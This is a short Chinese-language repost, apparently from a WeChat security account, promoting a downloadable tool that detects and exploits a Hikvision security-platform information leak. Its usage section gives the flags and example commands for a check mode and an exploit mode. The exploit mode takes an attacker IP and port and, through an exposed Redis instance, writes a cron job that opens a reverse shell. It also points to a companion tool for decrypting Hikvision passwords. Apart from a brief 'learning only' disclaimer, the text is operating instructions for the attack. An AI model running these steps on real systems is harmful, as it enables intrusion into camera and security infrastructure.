海康威视综合安防信息泄漏检测利用工具

海康威视综合安防信息泄露检测利用工具

点击原文链接进行下载，点击原文链接进行下载，点击原文链接进行下载，点击原文链接进行下载，点击原文链接进行下载，点击原文链接进行下载，点击原文链接进行下载，点击原文链接进行下载

简介

该工具用于海康威视信息泄露漏洞的检测，若目标redis对外开放可结合redis写入计划任务反弹shell。

!!!!!!!!!!!!!!!!!!!!注意!!!!!!!!!!!!!!!!!!!!

1.本工具只做学习交流用，代码开源，请勿用做违法用途。

2.本工具的利用模块需要结合海康密码解密工具

https://github.com/wafinfo/Hikvision

使用

1. 参数
   -c check is vuln(default) //检测模式
   -e reverse a shell  //利用模式
   -p string reverse port  //反弹端口
   -r string reverse ip  //反弹IP地址
   -u string target url  //目标url
2. 检测
   ./Hikvision_Info_Leak -c -u http://xxxx.xx.xxx.xx
3. 利用
   ./Hikvision_Info_Leak -e -u http://xxxx.xx.xxx.xx -r x.x.x.x -p 18080
   r参数为反弹IP的IP地址
   p参数为反弹端口参数
   以上两个参数在利用模式下都必须提供。

原文始发于微信公众号（Xsafe）：海康威视综合安防信息泄漏检测利用工具